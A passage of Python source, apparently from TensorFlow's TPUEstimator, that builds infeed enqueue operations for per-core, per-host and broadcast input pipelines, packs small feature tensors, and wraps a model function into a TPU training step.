# NOTE(xiejw): In prediction, stopping signals are inserted for each
# batch. And we append one more batch to signal the system it should stop.
# The data flow might look like
#
# batch 0: images, labels, stop = 0 (user provided)
# batch 1: images, labels, stop = 0 (user provided)
# ...
# batch 99: images, labels, stop = 0 (user provided)
# batch 100: images, labels, stop = 1 (TPUEstimator appended)
#
# where the final batch (id = 100) is appended by TPUEstimator, so we
# should drop it before returning the predictions to user.
# To achieve that, we throw the OutOfRangeError in after_run. Once
# Monitored Session sees this error in SessionRunHook.after_run, the
# "current" prediction, i.e., batch with id=100, will be discarded
# immediately
raise tf.errors.OutOfRangeError(None, None, 'Stopped by stopping signal.')
def generate_per_core_enqueue_ops_fn_for_host(ctx, input_fn,
inputs_structure_recorder,
host_device, host_id):
"""Generates infeed enqueue ops for per-core input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
def enqueue_ops_fn():
"""A fn returns enqueue_ops."""
num_cores_per_host = ctx.num_of_cores_per_host
per_host_sharded_inputs = []
for core_ordinal in range(num_cores_per_host):
with ops.name_scope('ordinal_%d' % (core_ordinal)):
user_context = tpu_context.TPUContext(
internal_ctx=ctx,
input_device=host_device,
invocation_index=host_id * ctx.num_of_cores_per_host + core_ordinal,
host_id=host_id)
inputs = _Inputs.from_input_fn(input_fn(user_context))
if inputs.is_dataset:
raise TypeError(
'`input_fn` returning `Dataset` is not yet supported in '
'per-Core input pipeline deployment yet. Please set '
'TPUConfig.per_host_input_for_training to True or return '
'`features` and `labels` from `input_fn`')
features, labels = inputs.features_and_labels()
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels))
per_host_sharded_inputs.append(flattened_inputs)
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]))
captured_infeed_queue.capture(infeed_queue)
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs, tpu_ordinal_function=tpu_ordinal_function_impl)
return per_host_enqueue_ops
return enqueue_ops_fn, captured_infeed_queue
def generate_per_host_enqueue_ops_fn_for_host(ctx, input_fn,
inputs_structure_recorder,
batch_axis, device, host_id):
"""Generates infeed enqueue ops for per-host input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
dataset_initializer = None
with tf.compat.v1.device(device):
user_context = tpu_context.TPUContext(
internal_ctx=ctx,
input_device=device,
invocation_index=host_id,
host_id=host_id)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
if not is_dataset:
raise TypeError(
'For mode PREDICT, `input_fn` must return `Dataset` instead of '
'`features` and `labels`.')
if batch_axis is not None:
raise TypeError('For mode PREDICT, batch_axis is not supported yet.')
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset,
batch_size=ctx.batch_size_for_input_fn,
add_padding=True)
if is_dataset:
dataset_initializer = inputs.dataset_initializer()
tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
def enqueue_ops_fn():
"""A Fn returning the TPU infeed enqueue ops.
By providing as a Fn, it can be invoked inside the tf.while_loop such that
the input pipeline for multiple iterations can be executed by one
Session.run call.
Returns:
list of dict of ops.
"""
with tf.compat.v1.device(device):
num_of_replicas_per_host = ctx.num_of_replicas_per_host
# Convert user input to features and labels. If the user returns a
# dataset, it is initialized and the features and labels extracted via
# `dataset.iterator.get_next()`
features, labels = inputs.features_and_labels()
signals = inputs.signals()
features, labels, enqueue_datas_list = (
_tpu_estimator_embedding.split_inputs(
ctx,
features,
labels,
num_cores_per_batch=num_of_replicas_per_host))
inputs_structure_recorder.validate_and_record_structure(features, labels)
unsharded_tensor_list = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals))
infeed_queue = tpu_feed.InfeedQueue(
tuple_types=[t.dtype for t in unsharded_tensor_list],
tuple_shapes=[t.shape for t in unsharded_tensor_list],
shard_dimensions=batch_axis)
captured_infeed_queue.capture(infeed_queue)
infeed_queue.set_number_of_shards(num_of_replicas_per_host)
per_host_enqueue_ops = (
infeed_queue.split_inputs_and_generate_enqueue_ops(
unsharded_tensor_list,
placement_function=lambda x: device,
tpu_ordinal_function=tpu_ordinal_function_impl))
if ctx.embedding_config:
per_host_enqueue_ops.extend(
ctx.embedding_config.tpu_embedding.generate_enqueue_ops(
enqueue_datas_list))
if signals is None:
return per_host_enqueue_ops
else:
return {
'ops': per_host_enqueue_ops,
'signals': signals,
}
return enqueue_ops_fn, captured_infeed_queue, dataset_initializer
def generate_per_host_v2_enqueue_ops_fn_for_host(ctx, input_fn,
inputs_structure_recorder,
device, host_id,
invocation_index):
"""Generates infeed enqueue ops for per-host input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
dataset_initializer = None
with tf.compat.v1.device(device):
user_context = tpu_context.TPUContext(
internal_ctx=ctx,
input_device=device,
invocation_index=invocation_index,
host_id=host_id)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if not is_dataset:
raise TypeError('`input_fn` must return a `Dataset` for the PER_HOST_V2 '
'input pipeline configuration.')
# Be aware that when num_cores_per_replica > num_cores_per_host,
# ctx.num_of_replicas_per_host is 0.
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset,
batch_size=ctx.batch_size_for_input_fn,
add_padding=True,
num_invocations_per_step=max(1, ctx.num_of_replicas_per_host))
dataset_initializer = inputs.dataset_initializer()
tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
def device_function_impl(shard_id):
if ctx.device_assignment is not None:
# Find the replica_id of the host's logical core 0.
# The current host_id is guaranteed to contain the logical core 0,
# even when num_cores_per_replica > num_cores_per_host -- the function
# caller makes sure that this host_id will must be receiving data (calls
# input_fn).
replica_id = ctx.device_assignment.lookup_replicas(
task_id=host_id, logical_core=0)[shard_id]
return ctx.tpu_host_placement_function(replica_id=replica_id)
else:
return None
def enqueue_ops_fn():
"""Generates the per_host enqueue ops."""
control_deps = []
per_host_sharded_inputs = []
enqueue_datas_list = []
# Be aware that when num_cores_per_replica > num_cores_per_host,
# ctx.num_of_replicas_per_host is 0.
num_replicas_per_host = max(1, ctx.num_of_replicas_per_host)
cached_signals = None
with tf.compat.v1.device(device):
if not inputs.is_dataset:
raise TypeError('`input_fn` must return a `Dataset` for this mode.')
for host in range(num_replicas_per_host):
# Use control dependencies to ensure a deterministic ordering.
if ctx.allow_per_host_v2_parallel_get_next:
features, labels = inputs.features_and_labels() # Calls get_next()
with tf.control_dependencies(control_deps):
if not ctx.allow_per_host_v2_parallel_get_next:
features, labels = inputs.features_and_labels() # Calls get_next()
signals = inputs.signals()
# All the replicas share the replica 0's stopping signal.
# This avoids inconsistent state among different model replcias.
if cached_signals:
signals['stopping'] = cached_signals['stopping']
else:
cached_signals = signals
features, labels, enqueue_data = (
_tpu_estimator_embedding.split_inputs(ctx, features, labels))
if len(enqueue_data) != 1:
raise RuntimeError(('Missing or extra enqueue_data for host {}. '
'len(enqueue_data) = {}.').format(
host, len(enqueue_data)))
enqueue_datas_list.append(enqueue_data[0])
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals))
control_deps.extend(flattened_inputs)
per_host_sharded_inputs.append(flattened_inputs)
if inputs_structure_recorder.flattened_input_dims:
input_partition_dims = inputs_structure_recorder.flattened_input_dims
if signals:
input_partition_dims += [None] * len(signals)
# pylint: disable=protected-access
infeed_queue = tpu_feed._PartitionedInfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]),
host_id=host_id,
input_partition_dims=input_partition_dims,
device_assignment=ctx.device_assignment)
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs)
else:
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]))
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs,
tpu_ordinal_function=tpu_ordinal_function_impl,
placement_function=device_function_impl)
captured_infeed_queue.capture(infeed_queue)
if ctx.embedding_config:
per_host_enqueue_ops.extend(
ctx.embedding_config.tpu_embedding.generate_enqueue_ops(
enqueue_datas_list))
if signals is None:
return per_host_enqueue_ops
else:
return {
'ops': per_host_enqueue_ops,
'signals': signals,
}
return enqueue_ops_fn, captured_infeed_queue, dataset_initializer
def generate_broadcast_enqueue_ops_fn(ctx, input_fn, inputs_structure_recorder,
num_hosts):
"""Generates infeed enqueue ops for one input_fn on all the hosts."""
captured_infeed_queue = _CapturedObject()
dataset_initializer = None
device_0 = ctx.tpu_host_placement_function(host_id=0)
with tf.compat.v1.device(device_0):
user_context = tpu_context.TPUContext(
internal_ctx=ctx, input_device=device_0, invocation_index=0, host_id=0)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
if not is_dataset:
raise TypeError(
'For mode PREDICT, `input_fn` must return `Dataset` instead of '
'`features` and `labels`.')
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset,
batch_size=ctx.batch_size_for_input_fn,
add_padding=True)
if is_dataset:
dataset_initializer = inputs.dataset_initializer()
num_replicas_per_host = ctx.num_of_replicas_per_host
def tpu_ordinal_function_impl(shard_id):
if ctx.device_assignment:
return ctx.device_assignment.tpu_ordinal(replica=shard_id)
else:
return shard_id % num_replicas_per_host
def device_function_impl(shard_id):
# shard_id ranges from 0 to num_of_replicas_per_host - 1.
# A shard is a replica inside a host.
# In broadcast mode (generate_broadcast_enqueue_ops_fn), the enqueue ops
# are always executed on the first host. Thus shard_id equals to replica_id.
return ctx.tpu_host_placement_function(replica_id=shard_id)
def enqueue_ops_fn():
"""Generates enqueue ops for all the hosts."""
broadcasted_inputs = []
flattened_inputs = None # Cache result from input_fn.
signals = None
num_replicas = ctx.num_replicas
core_id = 0
for host_id in xrange(num_hosts):
with tf.compat.v1.device(
ctx.tpu_host_placement_function(host_id=host_id)):
for _ in xrange(ctx.num_of_replicas_per_host):
# Note: input_fn is only called once at host 0 for the first replica.
# The features and labels returned from that invocation are
# broadcasted to other replicas(including the replicas on other
# hosts).
if flattened_inputs is None:
features, labels = inputs.features_and_labels() # Calls get_next()
signals = inputs.signals()
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals))
if (ctx.config.tpu_config.eval_training_input_configuration is
tpu_config.InputPipelineConfig.SLICED):
input_slices = [
tf.split(x, num_replicas) for x in flattened_inputs
]
if (ctx.config.tpu_config.eval_training_input_configuration is
tpu_config.InputPipelineConfig.SLICED):
# for each core, slice out the flattened_inputs for each core.
broadcasted_inputs.append([x[core_id] for x in input_slices])
core_id += 1
else:
broadcasted_inputs.append(flattened_inputs)
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(broadcasted_inputs[0]))
captured_infeed_queue.capture(infeed_queue)
enqueue_ops = infeed_queue.generate_enqueue_ops(
broadcasted_inputs,
tpu_ordinal_function=tpu_ordinal_function_impl,
placement_function=device_function_impl)
if signals is None:
return enqueue_ops
else:
return {
'ops': enqueue_ops,
'signals': signals,
}
return enqueue_ops_fn, captured_infeed_queue, dataset_initializer
class TensorPacker(object):
"""Pack and unpack small tensors into a big one for efficiency."""
def __init__(self, small_feature_dim_size,
minimum_num_small_features_to_group):
self._small_feature_dim_size = small_feature_dim_size
self._minimum_num_small_features_to_group = (
minimum_num_small_features_to_group)
def maybe_concatenate_features(self, features):
"""If there are enough small tensors, concat them for performance."""
self._small_feature_names = {}
self._small_feature_sizes = {}
feature_names = _extract_key_names(features)
if feature_names: # Not a single tensor.
# First pass: see if it is worth concatenating the small features.
for name in feature_names:
tensor = features[name]
# We do not handle nested inputs here.
if not isinstance(tensor, tf.Tensor):
return
shape = tensor.get_shape().as_list()
dtype = tensor.dtype
if (len(shape) == 2 and shape[1] is not None and
shape[1] <= self._small_feature_dim_size):
tf.compat.v1.logging.info('Found small feature: %s %s', name, shape)
if tensor.dtype not in self._small_feature_names:
self._small_feature_names[dtype] = []
self._small_feature_sizes[dtype] = []
self._small_feature_names[dtype].append(name)
self._small_feature_sizes[dtype].append(shape[1])
dtypes_ = list(self._small_feature_names.keys())
for dtype in dtypes_:
# If we could find 5 (or more) [batch_size, 1] dense features,
# we will group them.
if (len(self._small_feature_names[dtype]) <
self._minimum_num_small_features_to_group):
self._small_feature_names.pop(dtype) # reset
self._small_feature_sizes.pop(dtype) # reset
# Second pass: separate small features out
small_feature_tensors = {}
for dtype in self._small_feature_names:
small_feature_tensors[dtype] = []
for name in self._small_feature_names[dtype]:
small_feature_tensors[dtype].append(features.pop(name))
# Add the concat Tensor to features with a special key.
for dtype in self._small_feature_names:
key = self._get_small_feature_key(dtype)
if key in features:
raise ValueError('{} is reserved as feature key for concatenated'
'small features.')
features[key] = (tf.concat(small_feature_tensors[dtype], axis=1))
def maybe_split_features(self, maybe_concatenated_features):
for dtype in self._small_feature_names:
key = self._get_small_feature_key(dtype)
concatenated_small_features = maybe_concatenated_features.pop(key)
splits = tf.split(
concatenated_small_features, self._small_feature_sizes[dtype], axis=1)
for name, split in zip(self._small_feature_names[dtype], splits):
maybe_concatenated_features[name] = split
def _get_small_feature_key(self, dtype):
return _TENSOR_PACKER_CONCATENATED_SMALL_FEATURES_KEY + '_' + str(dtype)
class _InputPipeline(object):
"""`_InputPipeline` handles invoking `input_fn` and piping to infeed queue.
`_InputPipeline` abstracts the per-core/per-host `input_fn` invocation from
call site. To be precise, based on the configuration in
`_InternalTPUContext`, it invokes `input_fn` for all cores (usually
multi-host TPU training) or for one host (usually for single-host TPU
evaluation), and sends all `features` and `labels` returned by `input_fn` to
TPU infeed. For per-core invocation, `features` and `labels` are piped to
infeed directly, one tuple for each core. For per-host invocation, `features`
and `labels` are split at host (with respect to `batch_axis`) and piped to all
cores accordingly.
In addition, flatten/unflatten are handled by `_InputPipeline` also. Model
inputs returned by the `input_fn` can have one of the following forms:
1. features
2. (features, labels)
3. ((arbitrarily nested structure of features), labels)
Internally, form 1 is reformed to `(features, None)` as features and labels
are passed separately to underlying methods. For TPU training, TPUEstimator
may expect multiple `features` and `labels` tuples one for each core.
TPUEstimator allows various different structures for inputs (namely `features`
and `labels`). Both `features` and `labels` can be any nested sturcture
supported by TF nest (namely, dict, tuples, namedtuples or any nested
structure of such of Tensors). `labels` could be `None` as well.
These are flattened before they are passed to the infeed/outfeed library
as that expectes flattend lists.
"""
class InputsStructureRecorder(object):
"""The recorder to record inputs structure."""
def __init__(self, input_partition_dims=None):
# Holds the structure of inputs
self._feature_structure = {}
self._flattened_input_dims = None
if input_partition_dims:
# This should have been validated in TPUConfig.
assert len(input_partition_dims) <= 2, 'must have 1 or 2 elements.'
if len(input_partition_dims) == 2:
self._feature_dims, self._label_dims = input_partition_dims
else:
self._feature_dims = input_partition_dims[0]
self._label_dims = None
assert self._feature_dims is not None, ('input_partition_dims[0] must '
'not be None')
else:
self._feature_dims = None
self._label_dims = None
# Internal state.
self._initialized = False
@property
def flattened_input_dims(self):
assert self._initialized, 'InputsStructureRecorder is not initialized.'
return self._flattened_input_dims
def has_labels(self):
return 'labels' in self._feature_structure
def _flatten_input_dims(self, features, labels, feature_dims, label_dims):
"""Flatten input dims with the same order as flattened input tensors."""
try:
flattened_input_dims = data_nest.flatten_up_to(features, feature_dims)
except TypeError as e:
raise ValueError(
'TPUConfig.input_partition_dims[0] mismatched the structure of'
' features. input_partition_dims[0]: {}, features {}. {}'.format(
feature_dims, features, e))
if labels is not None:
if label_dims is not None:
try:
flattened_input_dims.extend(
data_nest.flatten_up_to(labels, self._label_dims))
except TypeError as e:
raise ValueError(
'TPUConfig.input_partition_dims[1] mismatched the structure of'
' labels. input_partition_dims[1]: {}, labels: {}. {}'.format(
label_dims, labels, e))
else:
num_label_tensors = len(data_nest.flatten(labels))
flattened_input_dims.extend([None] * num_label_tensors)
return flattened_input_dims
def validate_and_record_structure(self, features, labels):
"""Validates and records the structure of `features` and `labels`."""
# Extract structure.
feature_names = _extract_key_names(features)
label_names = _extract_key_names(labels)
if not self._initialized:
# Record structure.
self._initialized = True
if self._feature_dims is not None:
feature_dims_names = _extract_key_names(self._feature_dims)
if feature_dims_names != feature_names:
raise ValueError(
'TPUConfig.input_partition_dims[0] mismatched feature'
' keys. Expected {}, got {}'.format(feature_names,
feature_dims_names))
label_dims_names = _extract_key_names(self._label_dims)
if self._label_dims is not None and label_dims_names != label_names:
raise ValueError(
'TPUConfig.input_partition_dims[1] mismatched label'
' keys. Expected {}, got {}'.format(label_names,
label_dims_names))
self._flattened_input_dims = self._flatten_input_dims(
features, labels, self._feature_dims, self._label_dims)
def flatten_features_and_labels(self, features, labels, signals=None):
"""Flattens the `features` and `labels` to a single tensor list."""
self.tensor_packer = TensorPacker(
_TENSOR_PACKER_SMALL_FEATURE_DIM_SIZE,
_TENSOR_PACKER_MINIMUM_NUM_SMALL_FEATURES_TO_GROUP)
self.tensor_packer.maybe_concatenate_features(features)
self._feature_structure['features'] = features
if labels is not None:
self._feature_structure['labels'] = labels
if signals is not None:
self._feature_structure['signals'] = signals
return data_nest.flatten(self._feature_structure)
def unflatten_features_and_labels(self, flattened_inputs):
"""Restores the flattened inputs to original features and labels form.
Args:
flattened_inputs: Flattened inputs for each shard.
Returns:
A tuple of (`features`, `labels`), where `labels` could be None.
Each one, if present, should have identical structure (single tensor vs
dict) as the one returned by input_fn.
Raises:
ValueError: If the number of expected tensors from `flattened_inputs`
mismatches the recorded structure.
"""
unflattened_inputs = data_nest.pack_sequence_as(self._feature_structure,
flattened_inputs)
features = unflattened_inputs['features']
self.tensor_packer.maybe_split_features(features)
return _Inputs(
features,
unflattened_inputs.get('labels'),
signals=unflattened_inputs.get('signals'))
def __init__(self, input_fn, batch_axis, ctx):
"""Constructor.
Args:
input_fn: input fn for train or eval.
batch_axis: A python tuple of int values describing how each tensor
produced by the Estimator `input_fn` should be split across the TPU
compute shards.
ctx: A `_InternalTPUContext` instance with mode.
Raises:
ValueError: If both `sharded_features` and `num_cores` are `None`.
"""
self._inputs_structure_recorder = _InputPipeline.InputsStructureRecorder(
ctx.input_partition_dims)
self._sharded_per_core = ctx.is_input_sharded_per_core()
self._input_fn = input_fn
self._infeed_queue = None
self._ctx = ctx
self._batch_axis = batch_axis
def generate_infeed_enqueue_ops_and_dequeue_fn(self):
"""Generates infeed enqueue ops and dequeue_fn."""
# While tf.while_loop is called, the body function, which invokes
# `enqueue_fn` passed in, is called to construct the graph. So, input_fn
# structure is recorded.
enqueue_ops, all_hooks, run_infeed_loop_on_coordinator = (
self._invoke_input_fn_and_record_structure())
self._validate_input_pipeline()
def dequeue_fn():
"""dequeue_fn is used by TPU to retrieve the tensors."""
# In the model-parallel case, both the host-side and device-side
# computations must agree on the core on which infeed takes place. We
# choose to perform infeed on logical core 0 of each replica.
values = self._infeed_queue.generate_dequeue_op(tpu_device=0)
# The unflatten process uses the structure information recorded above.
return self._inputs_structure_recorder.unflatten_features_and_labels(
values)
return (enqueue_ops, dequeue_fn, all_hooks, run_infeed_loop_on_coordinator)
def _invoke_input_fn_and_record_structure(self):
"""Deploys the input pipeline and record input structure."""
enqueue_ops = []
infeed_queues = []
all_dataset_initializers = []
num_hosts = self._ctx.num_hosts
tpu_host_placement_fn = self._ctx.tpu_host_placement_function
run_infeed_loop_on_coordinator = True
if self._sharded_per_core:
# Per-Core input pipeline deployment.
# Invoke input pipeline for each core and placed on the corresponding
# host.
for host_id in range(num_hosts):
host_device = tpu_host_placement_fn(host_id=host_id)
with tf.compat.v1.device(host_device):
with ops.name_scope('input_pipeline_task%d' % (host_id)):
enqueue_ops_fn, captured_infeed_queue = (
generate_per_core_enqueue_ops_fn_for_host(
self._ctx, self._input_fn, self._inputs_structure_recorder,
host_device, host_id))
if _WRAP_INPUT_FN_INTO_WHILE_LOOP:
run_infeed_loop_on_coordinator = False
enqueue_ops.append(
_wrap_computation_in_while_loop(
device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
# Infeed_queue_getter must be called after enqueue_ops_fn is called.
infeed_queues.append(captured_infeed_queue.get())
elif self._ctx.is_input_broadcast_with_iterators():
# Only calls input_fn in host 0.
host_device = tpu_host_placement_fn(host_id=0)
enqueue_ops_fn, captured_infeed_queue, dataset_initializer = (
generate_broadcast_enqueue_ops_fn(self._ctx, self._input_fn,
self._inputs_structure_recorder,
num_hosts))
if dataset_initializer:
all_dataset_initializers.append(dataset_initializer)
run_infeed_loop_on_coordinator = False
wrap_fn = (
_wrap_computation_in_while_loop
if self._ctx.mode != model_fn_lib.ModeKeys.PREDICT else
_wrap_computation_in_while_loop_with_stopping_signals)
enqueue_ops.append(wrap_fn(device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
infeed_queues.append(captured_infeed_queue.get())
else:
# This branch handles two senarios:
# num_cores_per_replica > num_cores_per_host
# and num_cores_per_replica <= num_cores_per_host
# First, get the set of host_ids, by iterating replicas.
# We only want and will get the set of *unique* host_ids
# *that will call input_fn*. For each replica, we only call the input_fn
# from the CPU host that contains logical core 0.
# Use a list here to ensure deterministic order.
host_id_with_invocation_id_pair = []
if not self._ctx.is_replica_across_hosts():
for host_id in range(num_hosts):
invocation_index = host_id
host_id_with_invocation_id_pair.append((host_id, invocation_index))
else:
for replica_id in xrange(self._ctx.num_replicas):
invocation_index = replica_id
host_device, _ = self._ctx.device_for_replica(replica_id)
# TODO(lehou): Get host_id in a better way.
host_id = int(host_device.split('/task:')[1].split('/device:')[0])
host_id_with_invocation_id_pair.append((host_id, invocation_index))
for (host_id, invocation_index) in host_id_with_invocation_id_pair:
host_device = tpu_host_placement_fn(host_id=host_id)
with tf.compat.v1.device(host_device):
with ops.name_scope('input_pipeline_task%d' % (host_id)):
if self._ctx.is_input_per_host_with_iterators():
enqueue_ops_fn, captured_infeed_queue, dataset_initializer = (
generate_per_host_v2_enqueue_ops_fn_for_host(
self._ctx, self._input_fn,
self._inputs_structure_recorder, host_device, host_id,
invocation_index))
else:
enqueue_ops_fn, captured_infeed_queue, dataset_initializer = (
generate_per_host_enqueue_ops_fn_for_host(
self._ctx, self._input_fn,
self._inputs_structure_recorder, self._batch_axis,
host_device, host_id))
# NOTE(xiejw): We dispatch here based on the return type of the
# users `input_fn`.
#
# 1. If input_fn returns a Dataset instance, we initialize the
# iterator outside of tf.while_loop, and call the iterator.get_next
# inside tf.while_loop. This should be always safe.
#
# 2. If input_fn returns (features, labels), it is too late to wrap
# them inside tf.while_loop, as resource initialization cannot be
# handled in TF control flow properly. In this case, we will use
# python loop to enqueue the data into TPU system. This may be
# slow compared to the previous case.
if dataset_initializer:
all_dataset_initializers.append(dataset_initializer)
run_infeed_loop_on_coordinator = False
wrap_fn = (
_wrap_computation_in_while_loop
if self._ctx.mode != model_fn_lib.ModeKeys.PREDICT else
_wrap_computation_in_while_loop_with_stopping_signals)
enqueue_ops.append(
wrap_fn(device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
infeed_queues.append(captured_infeed_queue.get())
# infeed_queue is used to generate dequeue ops. The only thing it uses for
# dequeue is dtypes and types. So, any one can be used. Here, grab the
# first one.
self._infeed_queue = infeed_queues[0]
return enqueue_ops, [
util_lib.MultiHostDatasetInitializerHook(all_dataset_initializers)
], run_infeed_loop_on_coordinator
def _validate_input_pipeline(self):
"""Validates the input pipeline.
Perform some sanity checks to log user friendly information. We should
error out to give users better error message. But, if
_WRAP_INPUT_FN_INTO_WHILE_LOOP is False (legacy behavior), we cannot break
user code, so, log a warning.
Raises:
RuntimeError: If the validation failed.
"""
if tf.compat.v1.get_default_graph().get_collection(
tf.compat.v1.GraphKeys.QUEUE_RUNNERS):
err_msg = ('Input pipeline contains one or more QueueRunners. '
'It could be slow and not scalable. Please consider '
'converting your input pipeline to use `tf.data` instead (see '
'https://www.tensorflow.org/guide/datasets for '
'instructions.')
if _WRAP_INPUT_FN_INTO_WHILE_LOOP:
raise RuntimeError(err_msg)
else:
logging.warn(err_msg)
def call_computation(computation_inputs, computation, batch_config=None):
"""Call computation.
Args:
computation_inputs: A tensor or dict of tensors, the inputs to the
computation.
computation: A Python function that takes no inputs and builds computation
graph. If `computation` returns m outputs, this function will return a
list of m Tensors.
batch_config: A BatchConfig named tuple specifying the batching
configuration to use for inference batching.
Returns:
A list of output tensors.
"""
# Using `TPUPartitionedCall` makes it possible to target a different
# TPU core with every `Session.run()` call. Note that the entire inference
# graph executes on a single core, and that invocations of this graph
# will round-robin among the cores attached to a host.
def tpu_partitioned_call(partition_inputs):
# capture_resource_var_by_value enables variables to be mirrored on TPU
# to avoid fetching from CPU, since variables do not change during
# inference.
@function.Defun(capture_resource_var_by_value=False)
def tpu_subgraph():
return computation(partition_inputs)
return tpu_functional.TPUPartitionedCall(
args=tpu_subgraph.captured_inputs,
device_ordinal=tpu_ops.tpu_ordinal_selector(),
Tout=[o.type for o in tpu_subgraph.definition.signature.output_arg],
f=tpu_subgraph)
# Not using Batching Function but use TPUPartitionedCall/all cores.
if not batch_config:
return tpu_partitioned_call(computation_inputs)
# Use Batching Function and TPUPartitionedCall/all cores.
# Note that BatchingFunction requires a list of tensors and doesn't support
# a dict of tensors. So we preserve the structure by deterministically
# flattening the dict before batching and then recomposing it after batching
# to feed into the computation.
ordered_inputs_list = tf.nest.flatten(computation_inputs)
@tf.nondifferentiable_batch_function(
num_batch_threads=batch_config.num_batch_threads,
max_batch_size=batch_config.max_batch_size,
batch_timeout_micros=batch_config.batch_timeout_micros,
allowed_batch_sizes=batch_config.allowed_batch_sizes,
max_enqueued_batches=batch_config.max_enqueued_batches,
autograph=False)
def batched_tpu_computation(*tensor_args):
"""Recompose the input feature dict and calls the TPU computation."""
computation_feature_input = tf.nest.pack_sequence_as(
computation_inputs, tensor_args)
return tpu_partitioned_call(computation_feature_input)
return batched_tpu_computation(*ordered_inputs_list)
class _ModelFnWrapper(object):
"""A `model_fn` wrapper.
This makes calling model_fn on CPU and TPU easier and more consistent and
performs necessary check and mutation required by TPU training and evaluation.
In addition, this wrapper manages converting the `model_fn` to a single TPU
train and eval step.
"""
def __init__(self, model_fn, config, params, ctx):
self._model_fn = model_fn
self._config = config
self._params = params
self._ctx = ctx
def call_without_tpu(self, features, labels, is_export_mode):
return self._call_model_fn(features, labels, is_export_mode=is_export_mode)
def _add_embedding_features(self, features, hook_dummy_table_variables):
"""Add embedding features, optionally add hook to intercept gradient."""
if self._ctx.embedding_config:
tpu_embedding_ = self._ctx.embedding_config.tpu_embedding
embedding_activations = tpu_embedding_.get_activations()
if hook_dummy_table_variables:
new_embedding_activations = (
tpu_embedding_gradient.hook_dummy_table_variables_to_activations(
tpu_embedding_, embedding_activations,
self._ctx.embedding_config.dummy_table_variables))
features.update(new_embedding_activations)
else:
features.update(embedding_activations)
def convert_to_single_tpu_train_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single train step on TPU.
The user provided `model_fn` takes input tuple
(features, labels) and produces the EstimatorSpec with train_op and loss for
train `mode`. This usually represents a single train computation on CPU.
For TPU training, a train (computation) step is first wrapped in a
tf.while_loop control flow to repeat for many times and then replicated to
all TPU shards. Besides the input should be taken from TPU infeed rather
than input pipeline (input_fn) directly. To fit TPU loop and replicate
pattern, the original train computation should be reformed, which is the
returned `train_step`.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of train_fn, host_calls, and captured scaffold_fn. The train_fn
representing the train step for TPU.
"""
host_call = _OutfeedHostCall(
self._ctx,
outfeed_every_n_steps=self._config.tpu_config
.experimental_host_call_every_n_steps)
captured_scaffold_fn = _CapturedObject()
captured_training_hooks = _CapturedObject()
def train_step(step):
"""Training step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
self._add_embedding_features(features, True)
estimator_spec = self._verify_estimator_spec(
self._call_model_fn(features, labels))
loss, train_op = estimator_spec.loss, estimator_spec.train_op
if tensor_tracer.TensorTracer.is_enabled():
tt = tensor_tracer.TensorTracer()
loss = tt.trace_tpu(tf.compat.v1.get_default_graph(), loss, train_op,
self._ctx.num_replicas)
tracer_host_call = tt.host_call_deps_and_fn()
else:
tracer_host_call = {}
if isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
captured_scaffold_fn.capture(estimator_spec.scaffold_fn)
else:
captured_scaffold_fn.capture(None)
captured_training_hooks.capture(estimator_spec.training_hooks)
if self._ctx.embedding_config is None:
apply_sparse_grads = []
else:
tpu_embedding_ = self._ctx.embedding_config.tpu_embedding
gradients = (
tpu_embedding_gradient.get_gradients_through_dummy_table_variables(
tpu_embedding_))
grad_multiplier = self._ctx.embedding_config.get_grad_multiplier()
if grad_multiplier is not None:
scaled_gradients = collections.OrderedDict(
(k, v * grad_multiplier) for k, v in six.iteritems(gradients))
else:
scaled_gradients = gradients
apply_sparse_grads = [
tpu_embedding_.generate_send_gradients_op(
scaled_gradients, tf.compat.v1.train.get_global_step())
]
stopping_signals = None
user_provided_stopping_signals_name = None
if self._ctx.feed_hook is not None:
stopping_signals, user_provided_stopping_signals_name = \
self._ctx.feed_hook.get_stopping_signals_and_name(features)
# We must run train_op to update the variables prior to running the
# outfeed.
with tf.control_dependencies([train_op] + apply_sparse_grads):
host_call_outfeed_ops = []
host_call_fn, host_call_args = None, []
